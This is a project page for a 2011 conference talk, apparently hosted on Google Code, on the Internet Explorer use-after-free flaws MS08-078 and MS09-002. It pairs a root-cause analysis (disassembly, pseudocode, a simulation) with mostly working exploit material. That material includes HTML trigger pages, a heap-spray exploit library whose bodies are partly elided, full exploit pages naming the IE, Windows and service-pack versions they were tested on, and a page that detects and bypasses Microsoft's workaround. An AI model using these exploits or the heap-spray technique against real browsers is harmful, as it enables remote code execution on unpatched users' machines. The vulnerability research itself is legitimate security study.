Project Information

Project feeds
Code license
GNU GPL v3
Labels
inception, h2hc, nbrito, ms08-078, ms09-002, Academic

Members

Featured

Downloads

Links

Last update: Fri Dec 23 10:47:23 BRST 2011.

/*
 * $Id: h2hc-2011-nbrito-inception 1.0 2011/10/21 20:22:15 nbrito Exp $
 *
 * Talk:        Inception - The extended edition
 * Author:      Nelson Brito <nbrito *NoSPAM* sekure.org>  
 * Conference:  Hackers to Hackers Conference Eighth Edition (October 2011)
 */

Table of Contents

Inception @ H2HC 8 th Edition

Inception: The Extended Edition
MS08-078 Root Cause

Disassembled
Reverse engineered
Simulation code (HTML)

CVE-2008-4844 Description

Previous description
Current description
Recommended description

Exploit Library

Literal Object Namespacing (a.k.a. Beta)
Single Object Namespacing (a.k.a. Alpha)
MS08-078 + Exploit Library

BONUS

MS08-078 Universal Trigger
MS08-078 Automated Exploitation (a.k.a. Bypassing Workaround)
MS09-002 + Exploit Library

References
Disclaimer

Inception @ H2HC 8^th Edition

Inception: The Extended Edition

Please, refer to SlideShare for slide deck.

The demonstration videos are:

The following trigger is based on RSnake extraordinary document:

"XSS (Cross Site Scripting) Cheatsheet: Esp: for filter evasion"

<!--
   Talk:        Inception - The extended edition
   Author:      Nelson Brito <nbrito *NoSPAM* sekure.org>  
   Conference:  Hackers to Hackers Conference Eighth Edition (October 2011)  
-->
<HTML>
<SCRIPT LANGUAGE="JavaScript">
function Inception (){
	document.getElementById("b00m").innerHTML = 
		"<XML ID=I>" +
		"<X>" +
		"<C>" +
		"&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;" +
		"</C>" +
		"</X>" +
		"</XML>" +
		"<MARQUEE DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>" +
		"<MARQUEE DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>" +
		"</MARQUEE>" +
		"</MARQUEE>";
}
</SCRIPT>
<BODY onLoad="Inception();">
<DIV ID="b00m" STYLE="display: none;">
</DIV>
</BODY>
</HTML>

MS08-078 Root Cause

Disassembled

mshtml!CRecordInstance::TransferToDestination()

[...]
mov	edi,ecx				; ecx = array
mov	esi,dword ptr [edi+8]		; edi+08h = array length
xor	ebx,ebx				; ebx = 0 -> object counter
shr	esi,2				; esi >> 2 = array members
dec	esi				; esi = esi - 1  = array member object counter index
mov	dword ptr[ebp-4], ebx		; keep the object counter value in memory (ebp)
js	stop_loop			; if the return of this operation is negative
					; then exit the loop
					; else keep going
start_loop:				; this is where the loop starts
mov	eax,dword ptr [edi+0Ch]		; eax = current object pointer in the array
cmp	dword ptr [eax+ebx*4],0		; check if the current object pointer exists
je	increment_counter		; if the current object no longer exist
					; then increment the object counter
					; else keep going
mov	ecx,dword ptr [eax+ebx*4]	; ecx = current object pointer
					; then  calls the CXfer::TranferFromSrc
call	mshtml!CXfer::TransferFromSrc (7ea81cc0)
test	eax,eax				; what is the current object pointer?
je      increment_counter		; if the current object pointer has been changed
					; then increment the object counter
					; else keep going
[...]
increment_counter:
inc	ebx				; increment the object counter
cmp	ebx,esi				; compares array member object counter index and object counter
jle	start_loop			; if the object counter is less or equal to object counter index
					; then return to loop
					; else keep going
stop_loop:				; this is where the loop stops
mov	eax,dword ptr [ebp-4]
[...]
ret

Reverse engineered

mshtml!CRecordInstance::TransferToDestination()

[...]
	esi = ((dword ptr [edi+8]) >> 2) - 1;
	ebx = 0;

	do{
		eax = dword ptr [edi+12];
		ecx = dword ptr [eax+ebx*4];

		if(!(ecx)) break;

		ecx->mshtml!CXfer::TransferFromSrc();
		[...]
		ebx++;
	}while(ebx <= esi);
[...]

Simulation code (HTML)

To let you understand the root cause of this vulnerability, the following JavaScript tries to simulate the problem.

NOTE: IT IS JUST A SIMULATION CODE.

<!--
   Talk:        Inception - The extended edition
   Author:      Nelson Brito <nbrito *NoSPAM* sekure.org>  
   Conference:  Hackers to Hackers Conference Eighth Edition (October 2011)  
-->
<HTML>
<SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript">
/* It is just a simulation code. */
var bug     = true;
var control = true;
var patch   = false;

var edi = [8, ["0x12345678", "0x87654321"]];
var eax = "";
var ecx = "";

alert(
	"BUG simulation mode:\t"     + (bug     ? "ON" : "OFF") + "\n" +
	"CONTROL simulation mode:\t" + (control ? "ON" : "OFF") + "\n" +
	"PATCH simulation mode:\t"   + (patch   ? "ON" : "OFF")
);

function mshtmlCRecordInstanceTransferToDestination(){
	var esi = (edi[0] >> 2) - 1;
	var ebx = 0;

	do{
		eax = edi[1][ebx];
		ecx = eax;

		if(esi != ((edi[0] >> 2) - 1))
			alert("[1] mshtml!CRecordInstance::TransferToDestination():\n\t*WARNING* \'([edi+08h] >> 2) - 1\' = \'" + parseInt((edi[0] >> 2) - 1) + "\'");

		if(ecx == "")
			break;

		if(patch){
			/* Fixing the code. */
			eax = (edi[0] >> 2) - 1;

			if(eax <= ebx){
				alert("[1] mshtml!CRecordInstance::TransferToDestination():\n\t*PATCHED* \'eax\' = \'([edi+08h] >> 2) - 1\' = \'" + parseInt((edi[0] >> 2) - 1) + "\'");
				break;
			}
		}

		 mshtmlCXferTransferFromSrc();

		ebx++;

	}while(ebx <= esi);
}

function mshtmlCXferTransferFromSrc(){
	if(ecx == "0x12345678"){
		alert("[2] mshtml!CXfer::TransferFromSrc():\n\t\'ecx\' = " + ecx);
	}else if(ecx == "Freed Memory"){
		alert("[2] mshtml!CXfer::TransferFromSrc():\n\t\'ecx\' = " + ecx);
		return(true);
	}else if(ecx == "0x0a0a0a0a"){
		alert("[2] mshtml!CXfer::TransferFromSrc():\n\t\'HEAP SHELLCODE\' @ " + ecx);
		return(true);
	}
	
	if(bug)
		mshtmlCRecordInstanceRemoveBinding();

	if(bug && control)
		ole32ComPs_NdrDllCanUnloadNow();
}

function mshtmlCRecordInstanceRemoveBinding(){
	edi = [8, ["Freed Memory", "Freed Memory"]];
	alert("[3] mshtml!CRecordInstance::RemoveBinding():\n\t\'ntdll!RtlFreeHeap()\'")
}

function ole32ComPs_NdrDllCanUnloadNow(){
	edi = [4, ["0x0a0a0a0a", "0x0a0a0a0a"]];
	alert("[4] ole32!ComPs_NdrDllCanUnloadNow():\n\t\'ntdll!RtlAllocateHeap()\'");
}
</SCRIPT>
<BODY onLoad="mshtmlCRecordInstanceTransferToDestination();">
</BODY>
</HTML>

CVE-2008-4844 Description

After three years, the CVE Editorial Board has decided to change the description for CVE-2008-4844 based on this research. As a direct result, the CVE-2008-4844 is much more accurate than before. Check by yourself:

Previous description

Use-after-free vulnerability in mshtml.dll in Microsoft Internet Explorer 5.01, 6, and 7 on Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to execute arbitrary code via a crafted XML document containing nested SPAN elements, as exploited in the wild in December 2008.

Current description

Use-after-free vulnerability in the CRecordInstance::TransferToDestination function in mshtml.dll in Microsoft Internet Explorer 5.01, 6, 6 SP1, and 7 allows remote attackers to execute arbitrary code via DSO bindings involving (1) an XML Island, (2) XML DSOs, or (3) Tabular Data Control (TDC) in a crafted HTML or XML document, as demonstrated by nested SPAN or MARQUEE elements, and exploited in the wild in December 2008.

Recommended description

As you may remember, I have suggested the following description:

Internet Explorer 5.01, 6, 7, 8 Beta-1 and Beta-2 use-after-free condition within MSHTML.DLL, due to CRecordInstance::TransferToDestination() while checking for CXfer array size, allows remote code execution via crafted HTML document using (multiple) nested HTML Bindable Elements referring to predefined Data Source Object (XML Island, XML DSOs or Tabular Data Control).

Exploit Library

A JavaScript library (containing object properties and object methods) has been created to optimize the exploitation. This library is inspired on:

"Heap Feng Shui in JavaScript" by Alexander Sotirov.

Literal Object Namespacing (a.k.a. Beta)

/* 
 * $Id: ExploitLib.js 1.1 2011/10/21 19:58:48 nbrito Exp $
 *
 * Talk:        Inception - The extended edition
 * Author:      Nelson Brito <nbrito *NoSPAM* sekure.org>  
 * Conference:  Hackers to Hackers Conference Eighth Edition (October 2011)
 */

/**************************************************************************
 *         .___                            __  .__                        *
 *         |   | ____   ____  ____ _______/  |_|__| ____   ____           *
 *         |   |/    \_/ ___\/ __ \\____ \   __\  |/  _ \ /    \          *
 *         |   |   |  \  \__\  ___/|  |_> >  | |  (  <_> )   |  \         *
 *         |___|___|__/\_____>_____>   __/|__| |__|\____/|___|__/         *
 *                                 |__|                                   *
 *                     _______________  ____ ____                         *
 *                     \_____  \   _  \/_   /_   |                        *
 *                      /  ____/  /_\  \|   ||   |                        *
 *                     /       \  \_/   \   ||   |                        *
 *                     \________\_______/___||___|                        *
 *                                                                        *
 *                http://code.google.com/p/inception-h2hc/                *
 **************************************************************************
 * Pieces of this JavaScript code have been taken from:
 * 1. "Heap Feng Shui in JavaScript" (a.k.a. heapLib.js):
 *    - Author:    Alexander Sotirov
 *    - Reference: http://mcaf.ee/fsyxt
 *                 http://mcaf.ee/fxow1
 *
 * 2. "PwnZilla 5 - Exploit for IDN host name heap buffer overrun":
 *    - Author:    Berend-Jan Wever
 *    - Reference: http://mcaf.ee/xeydq
 *
 * 3. "How to impress girls with browser memory protection bypasses":
 *    - Author:    Alexander Sotirov and Mark Dowd
 *    - Reference: http://mcaf.ee/mpu7f
 *                 http://mcaf.ee/7mewi
 *
 ***************************************************************************
  Copyright (c) 2011 Nelson Brito. All rights reserved worldwide.
  
  This program is free software: you can redistribute it and/or modify it
  under  the terms of the GNU General Public License  as published by the
  Free Software Foundation,  either version 3 of the License, or (at your
  option) any later version.

  This program  is  distributed in  the hope that  it will be useful, but
  WITHOUT  ANY  WARRANTY;   without   even  the   implied   warranty   of
  MERCHANTABILITY  or  FITNESS  FOR  A  PARTICULAR  PURPOSE.  See the GNU
  General Public License for more details.

  You  should have  received a copy of the  GNU  General  Public  License
  along with this program.  If not, see <http://www.gnu.org/licenses/>.
 ***************************************************************************/

/* This JavaScript uses "Literal Object Namespacing". */
Exploit = function (){
	[...]

	return{
		code:
			[
				[...]
			 ],
		detail: 
			[],
		message:
			true,
		offset:
			[],
		rop:
			false,

		address:
			function (address, format){
				[...]
			},

		address2:
			function (address, format){
				[...]
			},

		ascii:
			function (method, format, size){
				[...]
			},

		banner:
			function (memory){
				[...]
			},

		check:
			function (address, shellcode, memory){
				[...]
			},

		chunk1mb:
			function (block64k){
				[...]
			},

		chunk64k:
			function (address, shellcode){
				[...]
			},

		even:
			function (shellcode){
				[...]
			},

		heap:
			function (block1mb, memory){
				[...]
			},

		hexa:
			function (address, size){
				[...]
			},

		memory:
			function (address, size){
				[...]
			},

		random:
			function (maximum){
				[...]
			},

		shellcode:
			function (shellcode, format){
				[...]
			},

		spray:
			function (address, shellcode, memory){
				[...]
			}
	};
};

Single Object Namespacing (a.k.a. Alpha)

/* 
 * $Id: ExploitLib-alpha.js 1.1 2011/10/21 19:41:48 nbrito Exp $
 *
 * Talk:        Inception - The extended edition
 * Author:      Nelson Brito <nbrito *NoSPAM* sekure.org>  
 * Conference:  Hackers to Hackers Conference Eighth Edition (October 2011)
 */
 
/**************************************************************************
 *         .___                            __  .__                        *
 *         |   | ____   ____  ____ _______/  |_|__| ____   ____           *
 *         |   |/    \_/ ___\/ __ \\____ \   __\  |/  _ \ /    \          *
 *         |   |   |  \  \__\  ___/|  |_> >  | |  (  <_> )   |  \         *
 *         |___|___|__/\_____>_____>   __/|__| |__|\____/|___|__/         *
 *                                 |__|                                   *
 *                     _______________  ____ ____                         *
 *                     \_____  \   _  \/_   /_   |                        *
 *                      /  ____/  /_\  \|   ||   |                        *
 *                     /       \  \_/   \   ||   |                        *
 *                     \________\_______/___||___|                        *
 *                                                                        *
 *                http://code.google.com/p/inception-h2hc/                *
 **************************************************************************
 * Pieces of this JavaScript code have been taken from:
 * 1. "Heap Feng Shui in JavaScript" (a.k.a. heapLib.js):
 *    - Author:    Alexander Sotirov
 *    - Reference: http://mcaf.ee/fsyxt
 *                 http://mcaf.ee/fxow1
 *
 * 2. "PwnZilla 5 - Exploit for IDN host name heap buffer overrun":
 *    - Author:    Berend-Jan Wever
 *    - Reference: http://mcaf.ee/xeydq
 *
 * 3. "How to impress girls with browser memory protection bypasses":
 *    - Author:    Alexander Sotirov and Mark Dowd
 *    - Reference: http://mcaf.ee/mpu7f
 *                 http://mcaf.ee/7mewi
 *
 ***************************************************************************
  Copyright (c) 2011 Nelson Brito. All rights reserved worldwide.
  
  This program is free software: you can redistribute it and/or modify it
  under  the terms of the GNU General Public License  as published by the
  Free Software Foundation,  either version 3 of the License, or (at your
  option) any later version.

  This program  is  distributed in  the hope that  it will be useful, but
  WITHOUT  ANY  WARRANTY;   without   even  the   implied   warranty   of
  MERCHANTABILITY  or  FITNESS  FOR  A  PARTICULAR  PURPOSE.  See the GNU
  General Public License for more details.

  You  should have  received a copy of the  GNU  General  Public  License
  along with this program.  If not, see <http://www.gnu.org/licenses/>.
 ***************************************************************************/

/* This JavaScript uses "Single Object Namespacing". */
Exploit.prototype.contructor = function Exploit (){
	[...]
	this.code    = new Array(
		[...]
	);
	this.detail  = new Array();
	this.message = new Boolean(true);
	this.offset  = new Array();
	this.rop     = new Boolean(false);
}

Exploit.prototype.address = function (address, format){
	[...]
}

Exploit.prototype.address2 = function (address, format){
	[...]
}

Exploit.prototype.ascii = function (method, format, size){
	[...]
}

Exploit.prototype.banner = function (memory){
	[...]
}

Exploit.prototype.check = function (address, shellcode, memory){
	[...]
}

Exploit.prototype.chunk1mb = function (block64k){
	[...]
}

Exploit.prototype.chunk64k = function (address, shellcode){
	[...]
}

Exploit.prototype.even = function (shellcode){
	[...]
}

Exploit.prototype.heap = function (block1mb, memory){
	[...]
}

Exploit.prototype.hexa = function (address, size){
	[...]
}

Exploit.prototype.memory = function (address, align){
	[...]
}

Exploit.prototype.random = function (maximum){
	[...]
}

Exploit.prototype.shellcode = function (shellcode, format){
	[...]
}

Exploit.prototype.spray = function (address, shellcode, memory){
	[...]
}

MS08-078 + Exploit Library

<!--
   Talk:        Inception - The extended edition
   Author:      Nelson Brito <nbrito *NoSPAM* sekure.org>  
   Conference:  Hackers to Hackers Conference Eighth Edition (October 2011)  
-->
<HTML>
<SCRIPT SRC="./ExploitLib.js" TYPE="text/javascript" LANGUAGE="JavaScript"></SCRIPT>
<SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript">
/*
 * Reliable trigger and exploitation tested on:
 *  - Microsoft Internet Explorer 7 (Version 7.0.5730.11)
 *    - Microsoft Windows XP Professional (Version 5.1 Build 2600 32-bit) Service Pack 3
 *    - Microsoft Windows Sever 2003 Enterprise (Version 5.2 Build 3790 32-bit) Service Pack 1
 *  - Microsoft Internet Explorer 7 (Version 7.0.6001.18000)
 *    - Microsoft Windows Vista Enterprise (Version 6.0 Build 6001 32-bit) Service Pack 1
 *    - Microsoft Windows Server 2008 Enterprise (Version 6.0 Build 6001 32-bit) Service Pack 1
 */
function Inception (){
	var ms08_078  = new Exploit(),
	    choice    = new Number(),
	    memory    = new Number(),
	    address   = new Number(),
	    shellcode = new String(),
	    trigger   = new String();

	ms08_078.detail  = [ "MS08-078", "0.01", "20111015", "Nelson Brito" ];
	ms08_078.offset  = [ 0x0a0a0a0a ];
	ms08_078.message = false;

	choice    = ms08_078.random(ms08_078.offset.length);
	memory    = ms08_078.memory(ms08_078.offset[choice], 16);
	address   = ms08_078.address(ms08_078.offset[choice], 0);
	shellcode = ms08_078.shellcode(ms08_078.code[1], 1);

	if(!(ms08_078.spray(ms08_078.address(0x00000000, 0), ms08_078.address(0x00000000, 0), memory))){
		alert("Inception(): Heap memory defragmentation failed!");
		CollectGarbage();
		window.location.replace("about:blank");
	}

	trigger = trigger.concat("<XML ID=I><X><C>&lt;IMG SRC=&quot;javascript:");
	trigger = trigger.concat(ms08_078.address(ms08_078.offset[choice], 2));
	trigger = trigger.concat("ert(&apos;XSS&apos;)&quot;&gt;</C></X></XML>");
	trigger = trigger.concat("<MARQUEE DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>");
	trigger = trigger.concat("<MARQUEE DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>");
	trigger = trigger.concat("</MARQUEE></MARQUEE>");

	if(ms08_078.spray(address, shellcode, memory))
		document.getElementById("b00m").innerHTML = trigger;
}
</SCRIPT>
<BODY onLoad="Inception();">
<DIV ID="b00m" STYLE="display: none;">
</DIV>
</BODY>
</HTML>

BONUS

MS08-078 Universal Trigger

This trigger is based on Microsoft sample for "Binding HTML Elements to Data":

"A(nchor)"

NOTE: THIS TRIGGER WORKS ON MICROSOFT INTERNET EXPLORER 6, BUT CRASHES IN A DIFFERENT MEMORY REGION.

<!--
   Talk:        Inception - The extended edition
   Author:      Nelson Brito <nbrito *NoSPAM* sekure.org>  
   Conference:  Hackers to Hackers Conference Eighth Edition (October 2011)  
-->
<HTML>
<SCRIPT SRC="../ExploitLib.js" TYPE="text/javascript" LANGUAGE="JavaScript"></SCRIPT>
<SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript">
/*
 * Reliable trigger and exploitation tested on:
 *  - Microsoft Internet Explorer 7 (Version 7.0.5730.11)
 *    - Microsoft Windows XP Professional (Version 5.1 Build 2600 32-bit) Service Pack 3
 *    - Microsoft Windows Sever 2003 Enterprise (Version 5.2 Build 3790 32-bit) Service Pack 1
 */
function Inception (){
	var ms08_078  = new Exploit(),
	    choice    = new Number(),
	    memory    = new Number(),
	    address   = new Number(),
	    shellcode = new String(),
	    trigger   = new String();

	ms08_078.detail  = ["MS08-078", "0.01", "20111015", "Nelson Brito"];
	ms08_078.offset  = [ 0x12345678 ];
	ms08_078.message = false;

	choice    = ms08_078.random(ms08_078.offset.length);
	memory    = ms08_078.memory(ms08_078.offset[choice]);
	address   = ms08_078.address(ms08_078.offset[choice], 0);
	shellcode = ms08_078.shellcode(ms08_078.code[1], 1);

	/*
	 * This trigger is based on Microsoft sample for "Binding HTML Elements to Data":
	 *  - http://samples.msdn.microsoft.com/workshop/samples/author/databind/dbanchor.htm
	 *
	 * Debugging output:
	 * mshtml!CXfer::TransferFromSrc+0x38:
	 * 7ea81cf8 ff9184000000    call    dword ptr [ecx+84h]  ds:0023:7620b2d8=08468bff
	 * 0:005> g
	 * (bc.e34): Access violation - code c0000005 (first chance)
	 * First chance exceptions are reported before any exception handling.
	 * This exception may be expected and handled.
	 * eax=76203520 ebx=00000000 ecx=7620b254 edx=7e90876d esi=02299cd0 edi=00190cd8
	 * eip=08468bff esp=01e8fc94 ebp=01e8fcc0 iopl=0         nv up ei pl nz na pe nc
	 * cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
	 * 08468bff ??              ???
	 *
	 * Using this trigger the exploit does not even need to overwrite the return address,
	 * because the code already crashes in the heap (08468bff). It just demands the heap
	 * spraying an amount of memory  larger than 132 MB.
	 *
	 * If you do not believe me, try the following settings:
	 *  - ms08_078.offset  = [0x90909090];
	 *  - memory           = 133;
	 */
	trigger = trigger.concat("<OBJECT CLASSID=\"clsid:333C7BC4-460F-11D0-BC04-0080C7055A83\" ID=\"tdcLinks\" HEIGHT=0 WIDTH=0>");
	trigger = trigger.concat("<PARAM NAME=\"DataURL\" VALUE=\"links.csv\">");
	trigger = trigger.concat("<PARAM NAME=\"UseHeader\" VALUE=\"True\">");
	trigger = trigger.concat("</OBJECT>");
	trigger = trigger.concat("<A DATASRC=\"#tdcLinks\" DATAFLD=\"link_href\">");
	trigger = trigger.concat("<SPAN DATASRC=\"#tdcLinks\" DATAFLD=\"link_friendly\">");
	trigger = trigger.concat("<SPAN DATASRC=\"#tdcLinks\" DATAFLD=\"link_friendly\">");
	trigger = trigger.concat("</SPAN></SPAN>")
	trigger = trigger.concat("</A>");

	if(ms08_078.spray(address, shellcode, memory))
		document.getElementById("b00m").innerHTML = trigger;
}
/*
 * Adjust the 'setTimeout' for your convenience, because the second loading
 * is the one which triggers the vulnerability.
 */
setTimeout('window.location.reload(true);', 2000);
</SCRIPT>
<BODY onLoad="Inception()">
<DIV ID="b00m" STYLE="display: none;">
</DIV>
</BODY>
</HTML>

MS08-078 Automated Exploitation (a.k.a. Bypassing Workaround)

This trigger attempts to check whether the Microsoft workaround "Disable XML Island functionality" has been applied.

<!--
   Talk:        Inception - The extended edition
   Author:      Nelson Brito <nbrito *NoSPAM* sekure.org>  
   Conference:  Hackers to Hackers Conference Eighth Edition (October 2011)  
-->
<HTML>
<LINK REL="stylesheet" HREF="./samples.css" TYPE="text/css">
<STYLE>
a:hover{
	color:red;
}
</STYLE>
<HEAD>
	<TITLE> Permutation Oriented Programming </TITLE>
	<LINK REL="icon"                      TYPE="image/ico" HREF="favicon.ico"/>
	<META HTTP-EQUIV="content-type"       CONTENT="text/html; charset=UTF-8"/>
	<META HTTP-EQUIV="content-style-type" CONTENT="text/css"/>
	<META NAME="author"                   CONTENT="Nelson Brito"/>
	<META NAME="copyright"                CONTENT="2004-2011 Nelson Brito"/>
	<META NAME="description"              CONTENT="Permutation Oriented Programming"/>
	<META NAME="keywords"                 CONTENT="Permutation Oriented Programming"/>
</HEAD>
<SCRIPT SRC="../../ExploitLib.js" TYPE="text/javascript" LANGUAGE="JavaScript"></SCRIPT>
<SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript">
/*
 * Reliable trigger and exploitation tested on:
 *  - Microsoft Internet Explorer 7 (Version 7.0.5730.11)
 *    - Microsoft Windows XP Professional (Version 5.1 Build 2600 32-bit) Service Pack 3
 *    - Microsoft Windows Sever 2003 Enterprise (Version 5.2 Build 3790 32-bit) Service Pack 1
 *  - Microsoft Internet Explorer 7 (Version 7.0.6001.18000)
 *    - Microsoft Windows Vista Enterprise (Version 6.0 Build 6001 32-bit) Service Pack 1
 *    - Microsoft Windows Server 2008 Enterprise (Version 6.0 Build 6001 32-bit) Service Pack 1
 */
 function Inception (){
	var ms08_078  = new Exploit(),
	    choice    = new Number(),
	    memory    = new Number(),
	    address   = new Number(),
	    shellcode = new String(),
	    trigger   = new String();
	var classid   = new Array(
			"550DDA30-0541-11D2-9CA9-0060B0EC3D39",	/* XML Data Source Object 1.0 */
			"F5078F39-C551-11D3-89B9-0000F81FE221", /* XML Data Source Object 3.0 */
			"F6D90F14-9C73-11D3-B32E-00C04F990BB4"  /* XML Data Source Object 3.0 */
		),
	    automation = new Boolean(false), wshell, hkey = "HKCR\\CLSID\\{379E501F-B231-11D1-ADC1-00805FC752D8}\\";

	ms08_078.detail = ["MS08-078", "0.01", "20111015", "Nelson Brito"];
	ms08_078.offset = [ 0x0a0a0a0a ];
	ms08_078.message = false;

	choice    = ms08_078.random(ms08_078.offset.length);
	memory    = ms08_078.memory(ms08_078.offset[choice]);
	address   = ms08_078.address(ms08_078.offset[choice], 0);
	shellcode = ms08_078.shellcode(ms08_078.code[2], 1);

	try{
		wshell = new ActiveXObject("WScript.Shell");
		automation = true;
	}catch(error){
		document.getElementById("message").innerHTML = "AUTOMATION FAILED";
		automation = false;
	}

	if(automation){
		try{
			wshell.RegRead(hkey);
			document.getElementById("message").innerHTML = "NOT APPLIED";
		}catch(error){
			document.getElementById("message").innerHTML = "APPLIED";
			automation = false;
		}
	}

	if(automation){
		trigger = trigger.concat("<XML ID=I><X><C>");
		trigger = trigger.concat("<![CDATA[<IMG SRC=\"javascript:" + ms08_078.address(ms08_078.offset[choice], 2) + "ert((\'XSS\')\">]]>");
		trigger = trigger.concat("</C></X></XML>");
	}else{
		trigger = trigger.concat("<OBJECT CLASSID=\"clsid:" + classid[ms08_078.random(classid.length)] + "\" ID=I><X><C>");
		trigger = trigger.concat("<![CDATA[<IMG SRC=\"javascript:" + ms08_078.address(ms08_078.offset[choice], 2) + "ert((\'XSS\')\">]]>");
		trigger = trigger.concat("</C></X></OBJECT>");
	}

	trigger = trigger.concat("<MARQUEE DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>");
	trigger = trigger.concat("<MARQUEE DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>");
	trigger = trigger.concat("</MARQUEE></MARQUEE>");

	if(ms08_078.spray(address, shellcode, memory))
		document.getElementById("b00m").innerHTML = trigger;
}
</SCRIPT>
<BODY>
<DIV CLASS="body">
	<H1>Hackers to Hackers Conference 8<SUP>th</SUP> Edition -- Inception Demonstration</H1>
		<TABLE>
			<THEAD>
				<TR>
					<TH COLSPAN=2>&quot;Disable XML Island functionality&quot; (KB961051)</TH>
				</TR>
			</THEAD>
			<TBODY>
				<TR>
					<TD>Workaround:</TD>
					<TD><DIV CLASS="inception" ID="message"></DIV></TD>
				</TR>
				<TR>
					<TD COLSPAN=2><INPUT TYPE=BUTTON VALUE="INCEPTION" onClick="Inception();"></TD>
				</TR>
			</TBODY>
		</TABLE>
		
		<DIV ID="b00m" STYLE="display: none;"></DIV>
	<P CLASS="viewsource">[Click on &quot;INCEPTION&quot; to automate the MS08-078 vulnerability exploitation]</P>
	<A CLASS="copyright" HREF="http://code.google.com/p/permutation-oriented-programming/">Permutation Oriented Programming</A>
	<BR/>
	<A CLASS="copyright" HREF="http://about.me/nbrito">&copy;2004-2011 Nelson Brito. All rights reserved worldwide.</A>
</DIV>
</BODY>
</HTML>

MS09-002 + Exploit Library

Here is another example, using Exploit Library, for MS09-002. But this example uses a correct approach, i.e.: document.createElement() and document.createAttribute(), using a single loop to overwrite the freed memory allocation.

<!--
   Talk:        Inception - The extended edition
   Author:      Nelson Brito <nbrito *NoSPAM* sekure.org>  
   Conference:  Hackers to Hackers Conference Eighth Edition (October 2011)  
-->
<HTML>
<SCRIPT SRC="../ExploitLib.js" TYPE="text/javascript" LANGUAGE="JavaScript"></SCRIPT>
<SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript">
/*
 * Reliable trigger and exploitation tested on:
 *  - Microsoft Internet Explorer 7 (Version 7.0.5730.11)
 *    - Microsoft Windows XP Professional (Version 5.1 Build 2600 32-bit) Service Pack 3
 *    - Microsoft Windows Sever 2003 Enterprise (Version 5.2 Build 3790 32-bit) Service Pack 1
 *  - Microsoft Internet Explorer 7 (Version 7.0.6001.18000)
 *    - Microsoft Windows Vista Enterprise (Version 6.0 Build 6001 32-bit) Service Pack 1
 *    - Microsoft Windows Server 2008 Enterprise (Version 6.0 Build 6001 32-bit) Service Pack 1
 */
function Inception (){
	var ms09_002   = new Exploit(),
	    choice     = new Number(),
	    memory     = new Number(),
	    address    = new Number(),
	    shellcode  = new String(),
	    __01       = document.createElement("option"),
	    __02, __03 = [ ["image", "src" ], ["area",  "href"], ["link",  "href"] ],
	    __04, __05,
	    __06       = new Array();

	ms09_002.detail = ["MS09-002", "0.01", "20111016", "Nelson Brito"];
	ms09_002.offset = [
		0x06060606, 0x08080808, 0x0c0c0c0c, 0x0e0e0e0e,
		0x10101010, 0x14141414, 0x15151515, 0x16161616,
		0x18181818, 0x20202020, 0x24242424, 0x27272727,
		0x28282828, 0x30303030
	];
	ms09_002.message = false;

	choice    = ms09_002.random(ms09_002.offset.length);
	memory    = ms09_002.memory(ms09_002.offset[choice], 16);
	address   = ms09_002.address(ms09_002.offset[choice], 0);
	shellcode = ms09_002.shellcode(ms09_002.code[1], 1);

	__01.componentFromPoint;
	__02 = __01.cloneNode();
	
	__01.clearAttributes();
	__01 = null;
	CollectGarbage();

	choice    = ms09_002.random(__03.length);

	__04      = document.createElement(__03[choice][0]);
	__05      = document.createAttribute(__03[choice][1]);

	__05.nodeValue = unescape(address + ms09_002.ascii("mixed", "ascii", (32 - (__03[choice][0].length + __03[choice][1].length))));
	__04.setAttributeNode(__05);
	
	for(var i = 0 ; i < (1024 - (__03[choice][0].length + __03[choice][1].length)) ; i++)
		__06.push(__04);

	if(ms09_002.spray(address, shellcode, memory))
		__02.componentFromPoint;
}
</SCRIPT>
<BODY onLoad="Inception();">
</BODY>
</HTML>

References

Disclaimer

This Google Project Hosting is provided to you "AS IS". While the project owner makes every effort to ensure that the contents of this Google Project Hosting are accurate and complete, he makes no representation or warranty, whether express or implied, as to the operation, integrity, availability or functionality of this Google Project Hosting or as to the accuracy, completeness or reliability of any information on this Google Project Hosting.

Any person who accesses this Google Project Hosting or relies on this Google Project Hosting or on the information contained in this Google Project Hosting does so at their own risk.

The project owner also makes no warranty or representation, whether express or implied, that the information or files available on this Google Project Hosting are free of viruses, destructive materials or any other data or code which is able to corrupt, compromise or jeopardise the operation or content of a computer system, computer network or your hardware or software. You accept all risk associated with the existence of such viruses, destructive materials or any other data or code which is able to corrupt, compromise or jeopardise the operation or content of a computer system, computer network or your hardware or software.

The project owner does not accept any responsibility for any errors or omissions on this Google Project Hosting, and all information, documents and codes provided on this Google Project Hosting are for educational purposes only!

"Be aware that the contents of this Google Project Hosting may be forbidden by some countries. VIEWER DISCRETION IS ADVISED!"

Inception @ H2HC 8th Edition